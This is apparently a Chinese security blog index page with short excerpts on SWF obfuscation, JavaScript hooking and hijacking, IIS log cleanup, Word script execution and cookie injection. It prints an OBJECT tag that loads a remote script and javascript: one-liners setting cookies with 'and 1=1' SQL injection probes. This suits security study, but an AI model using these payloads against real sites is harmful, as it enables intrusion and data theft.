鬼仔's Blog

作者：mikawawa

今天看rss reader上又有几个好友发了一些关于flash封装js代码的相关文章。看完后，仔细琢磨了一下，感觉应该把一些TIPS发到blog上做个备份吧。

一、首先，咱们说说flash代码的保护。
关于这个问题，我觉得对swf进行加密混淆很关键，因为浏览器在浏览到swf文件后都会缓存到本地，所以被拿到样本也就不足为奇了。但是如果能对其进行必要的加密混淆，我相信对于大多数人来说想要看到完整的源代码似乎就变得非常困难了。网上的混淆加密工具很多，我这里给一个大家可以测试下：
http://doswf.googlecode.com/files/DoSWF4.0.2.exe
当然好的加密混淆工具也是非常难得，看大家怎么去找了。
阅读全文 »

作者：刺

其实，JS中最简单的hook是直接重载目标函数。在之前提到的“JSON Hijacking”中就是使用的这种方法。

简单来说，就是把目标函数重新定义一遍，这样就会覆盖掉原来的函数，当函数执行时，就会跑去执行新的函数了。

但是这种方法效率不高，且通用性不好，所以我在Anehta 中重新实现了一次通用的hook函数。

Anehta 中的hook方法包括三个：hook、unhook、injectFn
阅读全文 »

来源：柳永法(yongfa365)’Blog

专题名称：IIS日志清理专题,CMD版,VBS版,JS版,WSH版

关键词：IIS日志清理,日志清理,IIS日志清理CMD版,IIS日志清理VBS版,IIS日志清理JS版,IIS日志清理WSH版

应用场合：主要用与虚拟主机，也可用于个人服务器

产生背景：2005 年某月某日，一向运行正常的虚拟主机死机了，让机房值班人员重启数次，都不成，接显示器进系统看，提示：C盘空间不足，半夜还得去机房处理，到机房后先断 网，再进系统发现有两个地方有问题，C:\WINDOWS\system32\LogFiles文件有6G，还有一个就是Symantec隔离病毒的地 方，到网上找了下，最大可能性是我们的虚拟主机的所有日志都写在这里，并且没人知道写在这里，郁闷，在IIS里看了下，还真是这么回事，日志天天都在长， 当时公司订单很多也没人关注这个，当时清理了一下，系统正常，回到公司后把IIS日志改到别的盘了。
阅读全文 »

作者：余弦
来源：0×37 Security

Microsoft word javascript execution原文：http://marc.info/?l=bugtraq&m=121121432823704&w=2，hi群内讨论过。可以得出一些结论：

1、由于安装Q313675 安全修补程序后禁用ActiveX 内联数据流功能，使得利用JS直接创建ActiveX对象而执行恶意codz的方法不可行。如下code：

<html>
<OBJECT classid=clsid:AE24FDAE-03C6-11D1-8B76-0080C744F389><param name=url value="javascript:document.write('&lt;script src=http://www.0x37.com/doc.js&gt;&lt;/script&gt;')"></OBJECT>

这个远程的doc.js文件能力有限。但是弹出对话框或一个新窗口还是可以的。
阅读全文 »

作者：lcx
来源：vbs小铺

阅读全文 »

作者：lcx
来源：vbs小铺

javascript:alert(document.cookie="参数= "+escape("参数值 and 1=1"));self.open("http://+"document.location.host+document.location.pathname);void(0);

javascript:alert(document.cookie="参数="+escape("参数值 and 1=2"));self.open("http://+"document.location.host+document.location.pathname);void(0);

哎，还是在新窗口打开了，不过比网上流传的省了一步刷新和返回了。

来源：vbs小铺

阅读全文 »

by luoluo
on 2007-11-30
luoluonet_at_yahoo.cn
http://www.ph4nt0m.org

一、概述

javascript函数劫持，也就是老外提到的javascript hijacking技术。最早还是和剑心同学讨论问题时偶然看到的一段代码，大概这样写的：
阅读全文 »